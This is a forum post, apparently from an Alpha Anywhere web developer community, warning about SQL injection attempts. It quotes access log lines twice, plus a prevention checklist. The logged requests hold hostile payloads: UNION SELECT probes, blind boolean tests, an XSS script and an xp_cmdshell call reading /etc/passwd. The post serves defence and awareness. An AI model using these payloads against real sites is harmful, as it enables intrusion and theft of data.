Just a notice that I have had several SQL Injection attacks on the iadn.com website in the last week, all from several Netherlands IP address. It has nothing to do with the site being Alpha. But you should review your logs occasionally and have a means to block by IP address (You can use the one built in to Alpha web server, but it is better to use a 3rd party tool because although Alpha's blocks access, each hit still takes up web server resources, and because you have to stop-start the Alpha server for the block to take effect).
Here is a summary of 'how to prevent' sql injection attacks from website: https://www.codeproject.com/Articles...on-How-to-Prev
Here is an example of how injectoin looks in the Alpha web server access log:
185.92.73.107 - - [05/Nov/2017:14:19:53 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d&qtsT%3D3276%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 60385
185.92.73.107 - - [05/Nov/2017:14:19:58 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d HTTP/1.1" 200 59573
185.92.73.107 - - [05/Nov/2017:14:20:02 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27%2C%22..%2C%29%2C.%28 HTTP/1.1" 200 59655
185.92.73.107 - - [05/Nov/2017:14:20:05 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27lnVaEb%3C%27%22%3EUCFjBq HTTP/1.1" 200 59665
185.92.73.107 - - [05/Nov/2017:14:20:16 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%206423%3D3998%20AND%20%286707%3D6707 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:22 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%201860%3D1860%20AND%20%281962%3D1962 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:26 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%204046%3D3998%20AND%20%289833%3D9833 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:30 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%203636%3D8661 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:35 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%201860%3D1860 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:38 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%206370%3D5443 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:42 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27%29%20AND%203672%3D8377%20AND%20%28%27GUvw%27%3D%27GUvw HTTP/1.1" 200 59765
Here is a summary of 'how to prevent' sql injection attacks from website: https://www.codeproject.com/Articles...on-How-to-Prev
- Encrypt sensitive data.
- Access the database using an account with the least privileges necessary.
- Install the database using an account with the least privileges necessary.
- Ensure that data is valid.
- Do a code review to check for the possibility of second-order attacks.
- Use parameterised queries.
- Use stored procedures.
- Re-validate data in stored procedures.
- Ensure that error messages give nothing away about the internal architecture of the application or the database.
Here is an example of how injectoin looks in the Alpha web server access log:
185.92.73.107 - - [05/Nov/2017:14:19:53 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d&qtsT%3D3276%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 60385
185.92.73.107 - - [05/Nov/2017:14:19:58 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d HTTP/1.1" 200 59573
185.92.73.107 - - [05/Nov/2017:14:20:02 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27%2C%22..%2C%29%2C.%28 HTTP/1.1" 200 59655
185.92.73.107 - - [05/Nov/2017:14:20:05 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27lnVaEb%3C%27%22%3EUCFjBq HTTP/1.1" 200 59665
185.92.73.107 - - [05/Nov/2017:14:20:16 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%206423%3D3998%20AND%20%286707%3D6707 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:22 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%201860%3D1860%20AND%20%281962%3D1962 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:26 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%204046%3D3998%20AND%20%289833%3D9833 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:30 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%203636%3D8661 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:35 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%201860%3D1860 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:38 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%206370%3D5443 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:42 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27%29%20AND%203672%3D8377%20AND%20%28%27GUvw%27%3D%27GUvw HTTP/1.1" 200 59765
Comment